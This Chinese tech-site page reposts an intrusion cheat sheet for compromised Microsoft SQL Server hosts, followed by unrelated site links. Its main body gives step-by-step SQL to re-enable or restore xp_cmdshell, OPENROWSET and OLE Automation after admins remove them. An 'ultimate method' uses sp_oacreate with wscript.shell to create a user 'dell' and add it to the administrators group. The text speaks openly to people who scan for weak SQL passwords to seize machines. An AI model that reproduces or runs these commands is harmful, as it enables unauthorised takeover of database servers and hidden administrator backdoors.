位置: 编程技术 - 正文

SQL入侵恢复xp_cmdshell方法总结

编辑:rootadmin
SQL入侵恢复xp_cmdshell方法总结 sql server 下开启xp_cmdshell的办法 EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE; SQL开启'OPENROWSET'支持的方法: exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE; SQL开启'sp_oacreate'支持的方法: exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE; 突破SA的各种困难 常见情况恢复执行xp_cmdshell 1 未能找到存储过程'master..xpcmdshell'. 恢复方法:查询分离器连接后, 第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog.dll'declare @o int 第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql.dll' 然后按F5键命令执行完毕 2 无法装载 DLL xpsql.dll 或该DLL所引用的某一 DLL。原因(找不到指定模块。) 恢复方法:查询分离器连接后, 第一步执行:sp_dropextendedproc "xp_cmdshell" 第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql.dll' 然后按F5键命令执行完毕 3 无法在库 xpweb.dll 中找到函数 xp_cmdshell。原因: (找不到指定的程序。) 恢复方法:查询分离器连接后, 第一步执行:exec sp_dropextendedproc 'xp_cmdshell' 第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb.dll' 然后按F5键命令执行完毕 四.终极方法. 如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户: 查询分离器连接后, servser系统: declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:winntsystemcmd.exe /c net user dell huxifeng /add' declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:winntsystemcmd.exe /c net localgroup administrators dell /add' xp或server系统: declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:windowssystemcmd.exe /c net user dell huxifeng /add' declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:windowssystemcmd.exe /c net localgroup administrators dell /add' -------------- xp_cmdshell新的恢复办法 删除 drop procedure sp_addextendedproc drop procedure sp_oacreate exec sp_dropextendedproc 'xp_cmdshell' 恢复 dbcc addextendedproc ("sp_oacreate","odsole.dll") dbcc addextendedproc ("xp_cmdshell","xplog.dll") 这样可以直接恢复,不用去管sp_addextendedproc是不是存在 ----------------------------- 删除扩展存储过过程xp_cmdshell的语句: exec sp_dropextendedproc 'xp_cmdshell' 恢复cmdshell的sql语句 exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog.dll' 开启cmdshell的sql语句 exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog.dll' 判断存储扩展是否存在 select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell' 返回结果为1就ok 恢复xp_cmdshell exec master.dbo.addextendedproc 'xp_cmdshell','xplog.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell' 返回结果为1就ok 否则上传xplog7.0.dll exec master.dbo.addextendedproc 'xp_cmdshell','c:winntsystemxplog.dll' 堵上cmdshell的sql语句 sp_dropextendedproc "xp_cmdshell ---------------- 删除sql危险存储: /*不狐 附上恢复扩展存储过程的办法 先恢复sp_addextendedproc,语句如下: SQL代码: 再恢复以上所有扩展存储过程 SQL代码: SQL Server 阻止了对组件 'xp_cmdshell' 的 过程'sys.xp_cmdshell' 的访问,因为此组件已作为此服务器安全配置的一部分而被关闭。系统管理员可以通过使用 sp_configure 启用 'xp_cmdshell'。有关启用 'xp_cmdshell' 的详细信息,请参阅 SQL Server 联机丛书中的 "外围应用配置器"。 经常扫SQL弱口令肉鸡的朋友应该遇见过这样的问题 ! 接下来我们用SQL语句搞定他 分析器执行的语句: EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE

推荐整理分享SQL入侵恢复xp_cmdshell方法总结,希望有所帮助,仅作参考,欢迎阅读内容。

SQL入侵恢复xp_cmdshell方法总结

文章相关热门搜索词:,内容如对您有帮助,希望把文章链接给更多的朋友!

sqlserver 函数、存储过程、游标与事务模板 1.标量函数:结果为一个单一的值,可包含逻辑处理过程。其中不能用getdate()之类的不确定性系统函数.--标量值函数--==============================================

ADO.NET EF中的实体修改方法 1.传统修改模式,看下列代码using(NorthwindEntitiescontext=newNorthwindEntities()){Regionregion=context.Region.FirstOrDefault(v=v.RegionID==4);region.RegionDescription="Test";context.SaveCha

sqlserver 聚集索引和非聚集索引实例 createdatabasemyIndexDemogousemyIndexDemogocreatetableABC(Aintnotnull,Bchar(),Cvarchar())goinsertintoABCselect1,'B','C'unionselect5,'B','C'unionselect7,'B','C'unionselect9,'B','C'goselect*fromABC-

标签: SQL入侵恢复xp_cmdshell方法总结

本文链接地址:https://www.jiuchutong.com/biancheng/349165.html 转载请保留说明!

上一篇:世界杯猜想活动的各类榜单的SQL语句小结(世界杯猜测)

下一篇:sqlserver 函数、存储过程、游标与事务模板(sqlserver函数大全)

  • PHP模板引擎Smarty内置变量调解器用法详解(php模板引擎原理)

    PHP模板引擎Smarty内置变量调解器用法详解(php模板引擎原理)

  • 某年第一周开始日期实现方法(在第一周)

    某年第一周开始日期实现方法(在第一周)

  • 503 service unavailable错误说明

    503 service unavailable错误说明

  • WIN764位系统8G内存识别一半解决办法

    WIN764位系统8G内存识别一半解决办法

  • iptables的基本配置规则小结(iptables用法)

    iptables的基本配置规则小结(iptables用法)

  • Windows7如何查看回收站对应的文件夹有哪些方法(Windows7如何查看电脑配置)

    Windows7如何查看回收站对应的文件夹有哪些方法(Windows7如何查看电脑配置)

  • Python学习小技巧之列表项的拼接(python怎么学啊)

    Python学习小技巧之列表项的拼接(python怎么学啊)

  • Nodejs学习笔记之NET模块(nodejs实战教程)

    Nodejs学习笔记之NET模块(nodejs实战教程)

  • Node.JS中快速扫描端口并发现局域网内的Web服务器地址(80)(nodejs 扫描目录)

    Node.JS中快速扫描端口并发现局域网内的Web服务器地址(80)(nodejs 扫描目录)

  • 基于JavaScript实现TAB标签效果(基于javascript的毕业设计)

    基于JavaScript实现TAB标签效果(基于javascript的毕业设计)

  • 什么情况下个人资产会被冻结
  • 当月出口的货物,可以过几个月申报吗
  • 一般纳税人季报怎么申报
  • 出口退税逾期申报说明怎样写
  • 企业所得税固定资产
  • 购买水果属于什么费用
  • 高速公路通行费发票怎么开
  • 联合体项目工程款如何拨付
  • 资产总额季度平均值计算公式
  • 百旺税控盘反写不了怎么回事
  • 简易计税的进项可以抵扣吗
  • 工会经费税前扣除凭证
  • 纳税人识别号的组成
  • 电子税务局财务负责人实名认证
  • 工程项目的存货含哪些科目
  • 管理费用会计科目代码是多少
  • 在租赁的土地上建房产权归谁
  • 企业购买房屋的行为涉及哪些税种
  • 年末转出未交增值税的视频
  • 摊销商标使用权的会计科目
  • 工程结算与工程施工
  • 代开的专票作废了怎么做账?
  • 公司自建房产的房产证
  • 旅游业要怎么进行差额征税处理
  • 展会展位费发票税率
  • 小规模超过30万是全额交税吗
  • 非房地产开发企业土地增值税扣除项目
  • 其他应付转到其他应收
  • 季度收入超过30万但开票只有10万
  • 核定征收个体户怎么报税
  • 工会经费怎么使用
  • app data文件夹
  • 上年超额广告费会计分录
  • 如何使用wordpress建站
  • 进程核心栈
  • 公司装修款怎么做分录
  • php数独游戏代码
  • 分页的实现
  • 房产税为什么会退税
  • 购买办公用品入库如何做账务处理
  • nodejs.org
  • laravel实战教程
  • 小规模纳税人什么意思
  • 销售费用占销售成本比例
  • 公司组织员工旅游费可以在税前扣除吗
  • 合同 成本
  • 在哪里验证增值税票
  • 印花税怎么交税率是多少
  • 税务异常怎么处理要多长时间
  • 长期借款属于什么会计分录
  • 本月盈利本年亏损要做分录吗
  • 普通发票税额没有打印全可以用么
  • 固定资产评估减值还是升值
  • 车辆保险费印花税计税金额含进项税吗
  • 非公司人员差旅怎么报销
  • 营改增后增加了什么征税项目
  • 组织员工旅游的租宿费的税额是什么
  • 企业的职工福利费
  • 其他应收怎么转收入
  • 科目汇总表里面要填累计折旧吗
  • 不含税价换算成含税价怎么算
  • Navicat for MySQL(mysql图形化管理工具)是什么?
  • win7系统ie浏览器怎么卸载重装
  • ie8-ie11
  • pps影音怎么没有了
  • 苹果电脑win10系统打不开
  • 有没有类似window的免费软件
  • win7如何更改欢迎界面
  • cocos2dx入门
  • html+css网页布局
  • node-red 全局变量
  • javascript中的函数如何理解
  • unity3d 版本
  • js根据对象的key来获取对应值
  • javascript入门经典
  • javascript初级教程
  • jquery解析XML及获取XML节点名称的实现代码
  • 研发费用加计扣除是什么意思啊
  • 陕西省机构改革方案获批
  • 土地税是怎么缴纳按什么缴纳
    • 免责声明:网站部分图片文字素材来源于网络,如有侵权,请及时告知,我们会第一时间删除,谢谢! 邮箱:opceo@qq.com

    鄂ICP备2023003026号

    网站地图: 企业信息 工商信息 财税知识 网络常识 编程技术

    友情链接: 武汉网站建设